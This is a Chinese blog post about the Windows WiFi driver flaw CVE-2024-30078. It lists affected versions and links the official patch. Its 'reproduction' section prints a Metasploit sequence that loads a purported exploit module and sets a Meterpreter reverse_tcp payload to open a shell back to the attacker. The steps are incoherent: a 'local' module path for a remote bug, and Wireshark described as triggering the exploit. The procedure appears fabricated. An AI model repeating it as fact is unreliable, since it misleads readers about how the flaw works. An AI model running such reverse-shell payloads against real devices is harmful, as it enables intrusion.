Windows WiFi 驱动程序远程代码执行漏洞(CVE-2024-30078)

已于 2024-07-15 22:25:10 修改
阅读量617 收藏 4
点赞数 4
分类专栏: 漏洞 文章标签: 安全 服务器
于 2024-07-15 22:24:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46023525/article/details/140440963
版权

Windows WiFi 驱动程序远程代码执行漏洞(CVE-2024-30078)

漏洞描述

此漏洞与WiFi驱动程序相关,允许攻击者在同一WiFi网络下远程执行代码,且这一过程不需要用户的任何交互。这意味着如果用户在公共场所,如机场、咖啡店或办公环境中使用受影响的设备连接到WiFi,设备可能会面临安全风险。

影响范围

Microsoft-Windows 10 1809
Microsoft-Windows Server 2012
Microsoft-Windows Server 2019
Microsoft-Windows 10 1607
Microsoft-Windows Server 2022
Microsoft-Windows 10 1507
version<10.0.10240.20680,version<10.0.14393.7070,version<10.0.17763.5936,version<10.0.19044.4529,version<10.0.19045.4529,version<10.0.22000.3019,version<10.0.22621.3737,version<10.0.22631.3737,version<10.0.14393.7070,version<10.0.17763.5936,version<10.0.20348.2522,version<10.0.25398.950受影响。
Microsoft-Windows 10 22h2
Microsoft-Windows 11 Version 21H2
Microsoft-Windows Server 2016
Microsoft-Windows Server 2008
Microsoft-Windows 10 21h2
Microsoft-Windows 11 Version 22H2
Microsoft-Windows 11 23h2
Microsoft-Windows Server 2022 23h2
Microsoft-Windows 11
Microsoft-Windows 10

漏洞利用过程

攻击者可能通过以下方式利用该漏洞:

  • 创建恶意网络,引诱用户连接,然后利用漏洞执行远程代码。
  • 利用中间人攻击(MITM)来截获和修改网络流量。
  • 利用附近的无线接入点(AP)来传播恶意代码。

复现过程

  1. 环境准备
    准备Windows操作系统并且已经安装了WiFi驱动程序。
    安装Wireshark,捕获网络流量。
    kali操作系统的Metasploit。
  2. 配置Metasploit。设置Metasploit为监听模式,并指定攻击载荷和目标IP地址,并启动监听器
use exploit/windows/local/cve_2024_30078_wifi_driver_rce
set LHOST <你的本地IP地址>
set RHOSTS <目标设备的IP地址>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT <你的本地监听端口>
exploit

  1. 触发漏洞:
    使用Wireshar监听目标设备上的网络流量,并尝试连接到目标设备的WiFi网络。

  2. 检测漏洞利用:
    在Metasploit控制台中看到一个新的会话已建立,表示漏洞已被成功利用。如果没有新的会话,需要调整Metasploit的配置或尝试不同的攻击向量。

  3. 提升权限:
    如果成功建立了会话,可以尝试提升权限,可执行任意命令。

漏洞修复

目前官方已修复此漏洞:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078

看着博客敲代码
关注
专栏目录
CVE-2017-11780 windows高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞, 针对CVE-2017-11771的Windows Search远程代码执行漏洞
CVE-2024-38077】核弹级Windows RCE漏洞如何自检并修复该漏洞(附批量漏洞检测工具及分析伪代码
热门推荐
m0_62783065的博客
08-09 1万+
CVE-2024-38077】核弹级RCE漏洞如何自检并修复该漏洞(附原文内分析伪代码
高危漏洞CVE-2024-38077的修复指南
Linux学习的那些事儿
08-13 7821
根据2024年8月9日,**国家信息安全漏洞共享平台**(CNVD)收录了Windows远程桌面许可服务远程代码执行漏洞**(CNVD-2024-34918,对应CVE-2024-38077)**。未经身份认证的攻击者可利用漏洞远程执行代码,获取服务器控制权限。目前,该漏洞的部分技术原理和概念验证伪代码已公开,厂商已发布安全更新完成修复。CNVD建议受影响的单位和用户安全即刻升级到最新版本。
震惊!微软又一个永恒之蓝?(CVE-2024-38077)
m0_62100902的博客
08-09 3704
上一个有如此影响力的Windows远程漏洞可能要追溯到2019年的BlueKeep(CVE-2019-0708)漏洞,相较BlueKeep,MadLicense的稳定性更高,且不受网络级身份验证(Network Level Authentication,NLA)的影响。研究人员的全网扫描结果显示,公网上至少有17万台活跃的Windows服务器开启了相关服务,而内网中受影响的服务器数量可能更多。鉴于该漏洞已有成熟稳定的利用证明和公开的验证代码,我们预计攻击者可能迅速开发出完整的漏洞利用方案。
CVE-2024-38077漏洞 2012R2系统更新失败
izmyzyq186的博客
08-10 8291
官方漏洞报告链接:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077下载安装出现报错。
CVE-2024-38077漏洞win2016server系统报错此更新不适用你的计算机,补丁号:KB5040434。
weixin_52371314的博客
08-14 2818
1.在根据微软官方提供的补丁进行安装补丁时,系统出现了报错,官方漏洞报告链接:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077。
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
文件"Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886).msu"就是这个安全更新的补丁,用户可以通过Windows Update或手动下载安装。此外,除了应用补丁,管理员还应该配置CredSSP以禁止加密协议降级,以...
Windows核弹漏洞披露!CVE-2024-38077(POC)
weixin_53523921的博客
08-10 5030
Windows核弹漏洞披露!CVE-2024-38077(POC)
Windows 远程桌面授权服务远程代码执行漏洞CVE-2024-38077)
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-10 3595
开启该服务(Windows 远程桌面授权服务)并且操作系统版本在受影响范围的 Windows Server 受影响,没有开启该服务但是操作系统版本在受影响范围的Windows Server 不受影响,Windows 10、Windows 11 等非 Server 版本的操作系统,不论是否开启Windows 远程桌面(RDS),均不受影响。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
微软7月补丁星期二修复142个漏洞,含4个0day
smellycat000的专栏
07-10 1119
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士微软在7月补丁星期二供修复了142个漏洞,其中2个是已遭利用漏洞,2个是已公开的0day。该补丁日共修复5个严重漏洞,均为远程代码执行漏洞。这些漏洞的类别如下:26个提权漏洞24个安全特性绕过漏洞59个远程代码执行漏洞9个信息泄露漏洞17个拒绝服务漏洞7个欺骗漏洞014个0day漏洞本月补丁星期二修复了2个已遭利用的漏洞和2个公开披露的0day漏...
最新微软远程代码执行漏洞CVE-2024-38077
收集盒 Book box
08-09 1404
选择“更新和安全”,进入“Windows更新”(Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”,步骤为“控制面板”->“系统和安全”->“Windows更新”)。近日监测到被命名为“狂躁许可(MadLicense)”的远程桌面许可服务远程代码执行漏洞CVE-2024-38077)的部分漏洞细节及PoC伪代码在互联网上公开,微软已在2024年7月月度更新中发布此漏洞的补丁。安装补丁后,请重启计算机以确保补丁生效。
Windows远程代码执行漏洞CVE-2024-38077)风险公告
qcloud_security的博客
08-09 2612
近期,微软披露一个远程代码执行严重漏洞CVE-2024-38077)。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被部署于开启了Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
CVE-2024-38077 Windows远程桌面授权服务漏洞介绍
轻舟已过万重山
08-14 1107
漏洞编号漏洞类型:远程代码执行 (RCE)影响范围:Windows远程桌面授权服务危害程度:极高发现时间:2024年8月初。
CVE-2024-38077 微软 RDP 漏洞修复 报错 不适用于你的计算机 解决方法
最新发布
it知识分享 free for nothing..
08-15 2256
CVE-2024-38077 微软 RDP 漏洞修复 报错 不适用于你的计算机解决方法
Windows SMBv3远程代码执行漏洞CVE-2020-0796:漏洞分析与修复策略
Windows SMBv3 远程代码执行漏洞CVE-2020-0796)是一起严重的安全问题,影响了Windows 10 Version 1903、1909以及Windows Server 1903、1909的多个版本。此漏洞属于SMB缓冲区溢出类型,允许未经授权的远程攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看着博客敲代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值